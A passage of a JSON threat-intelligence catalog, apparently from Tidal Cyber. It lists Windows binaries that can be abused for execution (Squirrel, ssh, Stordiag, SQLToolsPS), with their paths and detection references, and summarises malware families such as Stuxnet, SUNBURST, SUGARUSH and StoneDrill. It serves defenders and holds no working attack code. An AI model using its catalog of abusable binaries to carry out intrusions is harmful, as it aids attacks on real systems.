Moe\n\n**Paths:**\n* C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/993298228840992768](https://twitter.com/pabraeken/status/993298228840992768)\n* [https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017](https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017)\n\n**Detection:**\n* Sigma: [proc_creation_win_mssql_sqltoolsps_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml)\n* Splunk: [2021-10-05-suspicious_copy_on_system32.md](https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md)[[SQLToolsPS.exe - LOLBAS Project](/references/612c9569-80af-48d2-a853-0f6e3f55aa50)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5237", + "source": "Tidal Cyber", + "tags": [ + "f4867256-402a-4bcb-97d3-e071ee0993c1", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3c46936b-f9c4-4a3a-bea7-ca48f4a0660b", + "type": "similar" + } + ], + "uuid": "9271e5cf-f788-4d7d-9c7a-8d5e37cbb9a6", + "value": "SQLToolsPS" + }, + { + "description": "[[Squirrel.exe - LOLBAS Project](/references/952b5ca5-1251-4e27-bd30-5d55d7d2da5e)]", + "meta": { + "id": "0e821c02-47ec-4d22-9bfa-a02e48cb829f", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "13d5d060-8462-4592-8efb-2243fd2138d1", + "type": "similar" + } + ], + "uuid": "6a3de9d5-16e9-4467-b916-d4adeff389e1", + "value": "Squirrel.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.\n\n**Author:** Reegun J (OCBC Bank) - @reegun21\n\n**Paths:**\n* %localappdata%\\Microsoft\\Teams\\current\\Squirrel.exe\n\n**Resources:**\n* [https://www.youtube.com/watch?v=rOP3hnkj7ls](https://www.youtube.com/watch?v=rOP3hnkj7ls)\n* [https://twitter.com/reegun21/status/1144182772623269889](https://twitter.com/reegun21/status/1144182772623269889)\n* [http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/](http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/)\n* [https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12](https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12)\n* [https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56](https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_squirrel.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml)[[Squirrel.exe - LOLBAS Project](/references/952b5ca5-1251-4e27-bd30-5d55d7d2da5e)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5238", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "6a3de9d5-16e9-4467-b916-d4adeff389e1", + "type": "similar" + } + ], + "uuid": "13d5d060-8462-4592-8efb-2243fd2138d1", + "value": "Squirrel" + }, + { + "description": "[Squirrelwaffle](https://app.tidalcyber.com/software/46943a69-0b19-4d3a-b2a3-1302e85239a3) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) and the [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) banking trojan.[[ZScaler Squirrelwaffle Sep 2021](https://app.tidalcyber.com/references/624a62db-f00f-45f9-89f6-2c3505b4979f)][[Netskope Squirrelwaffle Oct 2021](https://app.tidalcyber.com/references/5559895a-4647-438f-b3d5-6d6aa323a6f9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1030", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3c18ad16-9eaf-4649-984e-68551bff0d47", + "type": "similar" + } + ], + "uuid": "46943a69-0b19-4d3a-b2a3-1302e85239a3", + "value": "Squirrelwaffle" + }, + { + "description": "[[ssh.exe - LOLBAS Project](/references/b1a9af1c-0cfc-4e8a-88ac-7d33cddc26a1)]", + "meta": { + "id": "8966a031-1ff0-42a6-9b32-bb818a83a23f", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7b607493-5035-4e29-9f95-55362f53b805", + "type": "similar" + } + ], + "uuid": "fa490d4d-26e4-4bb5-97b0-7bf89a8a99ed", + "value": "ssh.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.\n\n**Author:** Akshat Pradhan\n\n**Paths:**\n* c:\\windows\\system32\\OpenSSH\\ssh.exe\n\n**Resources:**\n* [https://gtfobins.github.io/gtfobins/ssh/](https://gtfobins.github.io/gtfobins/ssh/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_ssh.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml)\n* IOC: Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe.\n* IOC: command line arguments specifying execution.[[ssh.exe - LOLBAS Project](/references/b1a9af1c-0cfc-4e8a-88ac-7d33cddc26a1)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5164", + "source": "Tidal Cyber", + "tags": [ + "6070668f-1cbd-4878-8066-c636d1d8659c", + "d8f7e071-fbfd-46f8-b431-e241bb1513ac", + "64a55f86-15db-4599-b165-81be7f024397", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "fa490d4d-26e4-4bb5-97b0-7bf89a8a99ed", + "type": "similar" + } + ], + "uuid": "7b607493-5035-4e29-9f95-55362f53b805", + "value": "ssh" + }, + { + "description": "[SslMM](https://app.tidalcyber.com/software/3334a124-3e74-4a90-8ed1-55eea3274b19) is a full-featured backdoor used by [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) that has multiple variants. [[Baumgartner Naikon 2015](https://app.tidalcyber.com/references/09302b4f-7f71-4289-92f6-076c685f0810)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0058", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "2fb26586-2b53-4b9a-ad4f-2b3bcb9a2421", + "type": "similar" + } + ], + "uuid": "3334a124-3e74-4a90-8ed1-55eea3274b19", + "value": "SslMM" + }, + { + "description": "[Starloader](https://app.tidalcyber.com/software/fc18e220-2200-4d70-a426-0700ba14c4c0) is a loader component that has been observed loading [Felismus](https://app.tidalcyber.com/software/c66ed8ab-4692-4948-820e-5ce87cc78db5) and associated tools. [[Symantec Sowbug Nov 2017](https://app.tidalcyber.com/references/14f49074-fc46-45d3-bf7e-30c896c39c07)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0188", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6632f07f-7c6b-4d12-8544-82edc6a7a577", + "type": "used-by" + }, + { + "dest-uuid": "96566860-9f11-4b6f-964d-1c924e4f24a4", + "type": "similar" + } + ], + "uuid": "fc18e220-2200-4d70-a426-0700ba14c4c0", + "value": "Starloader" + }, + { + "description": "[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]", + "meta": { + "id": "8e28032c-1c65-449d-bb5a-172fa6a84428" + }, + "related": [ + { + "dest-uuid": "764c6121-2d15-4a10-ac53-b1c431dc8b47", + "type": "similar" + } + ], + "uuid": "38298e66-6bbb-4ecf-b287-ccd3e47c6cd4", + "value": "CANOPY" + }, + { + "description": "[STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) is Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6), possibly since at least November 2021; there is also a [STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) by UNC3313, which may be associated with [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6).[[Mandiant UNC3313 Feb 2022](https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)][[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1037", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "e355fc84-6f3c-4888-8e0a-d7fa9c378532", + "type": "similar" + }, + { + "dest-uuid": "38298e66-6bbb-4ecf-b287-ccd3e47c6cd4", + "type": "similar" + } + ], + "uuid": "764c6121-2d15-4a10-ac53-b1c431dc8b47", + "value": "STARWHALE" + }, + { + "description": "[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)]", + "meta": { + "id": "7b763f9c-e0ea-4437-b880-19e4332173a3" + }, + "related": [ + { + "dest-uuid": "9eee52a2-5ac1-4561-826c-23ec7fbc7876", + "type": "similar" + } + ], + "uuid": "ab440fcd-bee3-42f5-a4a9-7edfd5c3992c", + "value": "DROPSHOT" + }, + { + "description": "[StoneDrill](https://app.tidalcyber.com/software/9eee52a2-5ac1-4561-826c-23ec7fbc7876) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac).[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)][[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0380", + "source": "MITRE", + "tags": [ + "2e621fc5-dea4-4cb9-987e-305845986cd3" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "8dbadf80-468c-4a62-b817-4e4d8b606887", + "type": "similar" + }, + { + "dest-uuid": "ab440fcd-bee3-42f5-a4a9-7edfd5c3992c", + "type": "similar" + } + ], + "uuid": "9eee52a2-5ac1-4561-826c-23ec7fbc7876", + "value": "StoneDrill" + }, + { + "description": "[[Stordiag.exe - LOLBAS Project](/references/5e52a211-7ef6-42bd-93a1-5902f5e1c2ea)]", + "meta": { + "id": "18977de8-2103-4da3-8de1-9d6dd7641648", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7430c53f-41a0-4395-88c7-fc2c34ee52c7", + "type": "similar" + } + ], + "uuid": "e93f9136-4ef0-4b23-85bd-93f2b56b2316", + "value": "Stordiag.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Storage diagnostic tool\n\n**Author:** Eral4m\n\n**Paths:**\n* c:\\windows\\system32\\stordiag.exe\n* c:\\windows\\syswow64\\stordiag.exe\n\n**Resources:**\n* [https://twitter.com/eral4m/status/1451112385041911809](https://twitter.com/eral4m/status/1451112385041911809)\n\n**Detection:**\n* Sigma: [proc_creation_win_stordiag_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml)\n* IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\[[Stordiag.exe - LOLBAS Project](/references/5e52a211-7ef6-42bd-93a1-5902f5e1c2ea)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5165", + "source": "Tidal Cyber", + "tags": [ + "f0e3d6ea-d7ea-4d73-b868-1076fac744a8", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "e93f9136-4ef0-4b23-85bd-93f2b56b2316", + "type": "similar" + } + ], + "uuid": "7430c53f-41a0-4395-88c7-fc2c34ee52c7", + "value": "Stordiag" + }, + { + "description": "[StreamEx](https://app.tidalcyber.com/software/502b490c-2067-40a4-8f73-7245d7910851) is a malware family that has been used by [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. [[Cylance Shell Crew Feb 2017](https://app.tidalcyber.com/references/c0fe5d29-838b-4e91-bd33-59ab3dbcfbc3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0142", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "used-by" + }, + { + "dest-uuid": "91000a8a-58cc-4aba-9ad0-993ad6302b86", + "type": "similar" + } + ], + "uuid": "502b490c-2067-40a4-8f73-7245d7910851", + "value": "StreamEx" + }, + { + "description": "[StrifeWater](https://app.tidalcyber.com/software/dd8bb0a3-6cb1-412d-adeb-cbaae98462a9) is a remote-access tool that has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) in the initial stages of their attacks since at least November 2021.[[Cybereason StrifeWater Feb 2022](https://app.tidalcyber.com/references/30c911b2-9a5e-4510-a78c-c65e84398c7e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1034", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a41725c5-eb3a-4772-8d1e-17c3bbade79c", + "type": "used-by" + }, + { + "dest-uuid": "fb78294a-7d7a-4d38-8ad0-92e67fddc9f0", + "type": "similar" + } + ], + "uuid": "dd8bb0a3-6cb1-412d-adeb-cbaae98462a9", + "value": "StrifeWater" + }, + { + "description": "[StrongPity](https://app.tidalcyber.com/software/ed563524-235e-4e06-8c69-3f9d8ddbfd8a) is an information stealing malware used by [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0).[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)][[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0491", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "cc798766-8662-4b55-8536-6d057fbc58f0", + "type": "used-by" + }, + { + "dest-uuid": "20945359-3b39-4542-85ef-08ecb4e1c174", + "type": "similar" + } + ], + "uuid": "ed563524-235e-4e06-8c69-3f9d8ddbfd8a", + "value": "StrongPity" + }, + { + "description": "[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)] ", + "meta": { + "id": "18e5b628-d583-4260-8ae4-64a744f9dcfc" + }, + "related": [ + { + "dest-uuid": "3fdf3833-fca9-4414-8d2e-779dabc4ee31", + "type": "similar" + } + ], + "uuid": "7948eb8a-e138-4365-81c4-aac07e632912", + "value": "W32.Stuxnet" + }, + { + "description": "[Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)][[CISA ICS Advisory ICSA-10-272-01](https://app.tidalcyber.com/references/25b3c18c-e017-4773-91dd-b489220d4fcb)][[ESET Stuxnet Under the Microscope](https://app.tidalcyber.com/references/4ec039a9-f843-42de-96ed-185c4e8c2d9f)][[Langer Stuxnet](https://app.tidalcyber.com/references/76b99581-e94d-4e51-8110-80557474048e)] [Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) was discovered in 2010, with some components being used as early as November 2008.[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0603", + "source": "MITRE", + "tags": [ + "a98d7a43-f227-478e-81de-e7299639a355" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "088f1d6e-0783-47c6-9923-9c79b2af43d4", + "type": "similar" + }, + { + "dest-uuid": "7948eb8a-e138-4365-81c4-aac07e632912", + "type": "similar" + } + ], + "uuid": "3fdf3833-fca9-4414-8d2e-779dabc4ee31", + "value": "Stuxnet" + }, + { + "description": "[S-Type](https://app.tidalcyber.com/software/b19b6c38-d38b-46f2-a535-d0bfc5790368) is a backdoor that was used in [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) since at least 2013.[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0085", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "66b1dcde-17a0-4c7b-95fa-b08d430c2131", + "type": "similar" + } + ], + "uuid": "b19b6c38-d38b-46f2-a535-d0bfc5790368", + "value": "S-Type" + }, + { + "description": "[SUGARDUMP](https://app.tidalcyber.com/software/6ff7bf2e-286c-4b1b-92a0-1e5322870c59) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) campaign. The first known [SUGARDUMP](https://app.tidalcyber.com/software/6ff7bf2e-286c-4b1b-92a0-1e5322870c59) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1042", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "9c10cede-c0bb-4c5c-91c0-8baec30abaf6", + "type": "similar" + } + ], + "uuid": "6ff7bf2e-286c-4b1b-92a0-1e5322870c59", + "value": "SUGARDUMP" + }, + { + "description": "[SUGARUSH](https://app.tidalcyber.com/software/004c781a-3d7d-446b-9677-a042c8f6566e) is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. [SUGARUSH](https://app.tidalcyber.com/software/004c781a-3d7d-446b-9677-a042c8f6566e) was first identified during analysis of UNC3890's [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) campaign targeting Israeli companies, which began in late 2020.[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1049", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "44e2a842-415b-47f4-8549-83fbdb8a5674", + "type": "similar" + } + ], + "uuid": "004c781a-3d7d-446b-9677-a042c8f6566e", + "value": "SUGARUSH" + }, + { + "description": "[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]", + "meta": { + "id": "1b98b321-5262-4da9-bb56-4bca5dbe4a18" + }, + "related": [ + { + "dest-uuid": "6b04e98e-c541-4958-a8a5-d433e575ce78", + "type": "similar" + } + ], + "uuid": "a38c6f81-a115-4f16-bcba-7d8c163d4f08", + "value": "Solorigate" + }, + { + "description": "[SUNBURST](https://app.tidalcyber.com/software/6b04e98e-c541-4958-a8a5-d433e575ce78) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least February 2020.[[SolarWinds Sunburst Sunspot Update January 2021](https://app.tidalcyber.com/references/1be1b6e0-1b42-4d07-856b-b6321c17bb88)][[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0559", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "a8839c95-029f-44cf-8f3d-a3cf2039e927", + "type": "similar" + }, + { + "dest-uuid": "a38c6f81-a115-4f16-bcba-7d8c163d4f08", + "type": "similar" + } + ], + "uuid": "6b04e98e-c541-4958-a8a5-d433e575ce78", + "value": "SUNBURST" + }, + { + "description": "[SUNSPOT](https://app.tidalcyber.com/software/66966a12-3db3-4e43-a7e8-6c6836ccd8fe) is an implant that injected the [SUNBURST](https://app.tidalcyber.com/software/6b04e98e-c541-4958-a8a5-d433e575ce78) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least February 2020.[[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0562", + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "bf48e7f8-752c-4ce8-bf8f-748edacd8fa6", + "type": "similar" + } + ], + "uuid": "66966a12-3db3-4e43-a7e8-6c6836ccd8fe", + "value": "SUNSPOT" + }, + { + "description": "[SUPERNOVA](https://app.tidalcyber.com/software/f02abaee-237b-4891-bb5d-30ca86dfc2c8) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://app.tidalcyber.com/software/f02abaee-237b-4891-bb5d-30ca86dfc2c8) may have been used by the China-based threat group SPIRAL.[[Guidepoint SUPERNOVA Dec 2020](https://app.tidalcyber.com/references/78fee365-ab2b-4823-8358-46c362be1ac0)][[Unit42 SUPERNOVA Dec 2020](https://app.tidalcyber.com/references/e884d0b5-f2a2-47cb-bb77-3acdac6b1790)][[SolarWinds Advisory Dec 2020](https://app.tidalcyber.com/references/4e8b908a-bdc5-441b-bc51-98dfa87f6b7a)][[CISA Supernova Jan 2021](https://app.tidalcyber.com/references/ce300d75-8351-4d7c-b280-7d5fbe17f9bb)][[Microsoft Analyzing Solorigate Dec 2020](https://app.tidalcyber.com/references/8ad72d46-ba2c-426f-bb0d-eb47723c8e11)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0578", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b2b0b946-be0a-4a7f-9c32-a2e5211d1cd9", + "type": "similar" + } + ], + "uuid": "f02abaee-237b-4891-bb5d-30ca86dfc2c8", + "value": "SUPERNOVA" + }, + { + "description": "[SVCReady](https://app.tidalcyber.com/software/a8110f81-5ee9-5819-91ce-3a57aa330dcb) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://app.tidalcyber.com/groups/8951bff3-c444-4374-8a9e-b2115d9125b2) activity and [SVCReady](https://app.tidalcyber.com/software/a8110f81-5ee9-5819-91ce-3a57aa330dcb) distribution, including similarities in file names, lure images, and identical grammatical errors.[[HP SVCReady Jun 2022](https://app.tidalcyber.com/references/48d5ec83-f1b9-595c-bb9a-d6d5cc513a41)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1064", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7230ded7-3b1a-4d6e-9735-d0ffd47af9f6", + "type": "similar" + } + ], + "uuid": "a8110f81-5ee9-5819-91ce-3a57aa330dcb", + "value": "SVCReady" + }, + { + "description": "[Sykipot](https://app.tidalcyber.com/software/ae749f9c-cf46-42ce-b0b8-f0be8660e3f3) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://app.tidalcyber.com/software/ae749f9c-cf46-42ce-b0b8-f0be8660e3f3) hijacks smart cards on victims. [[Alienvault Sykipot DOD Smart Cards](https://app.tidalcyber.com/references/1a96544f-5b4e-4e1a-8db0-a989df9e4aaa)] The group using this malware has also been referred to as Sykipot. [[Blasco 2013](https://app.tidalcyber.com/references/46be6b77-ee2b-407e-bdd4-5a1183eda7f3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0018", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9", + "type": "similar" + } + ], + "uuid": "ae749f9c-cf46-42ce-b0b8-f0be8660e3f3", + "value": "Sykipot" + }, + { + "description": "[SynAck](https://app.tidalcyber.com/software/19ae8345-745e-4872-8a29-d56c8800d626) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. [[SecureList SynAck Doppelgänging May 2018](https://app.tidalcyber.com/references/d9f0af0f-8a65-406b-9d7e-4051086ef301)] [[Kaspersky Lab SynAck May 2018](https://app.tidalcyber.com/references/bbb9bcb5-cd44-4dcb-a7e5-f6c4cf93f74f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0242", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "04227b24-7817-4de1-9050-b7b1b57f5866", + "type": "similar" + } + ], + "uuid": "19ae8345-745e-4872-8a29-d56c8800d626", + "value": "SynAck" + }, + { + "description": "[[Syncappvpublishingserver.vbs - LOLBAS Project](/references/adb09226-894c-4874-a2e3-fb2c6de30173)]", + "meta": { + "id": "daea197b-7684-450f-93f8-b60a0284469d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "6af0eac2-c35f-4569-ae09-47f1ca846961", + "type": "similar" + } + 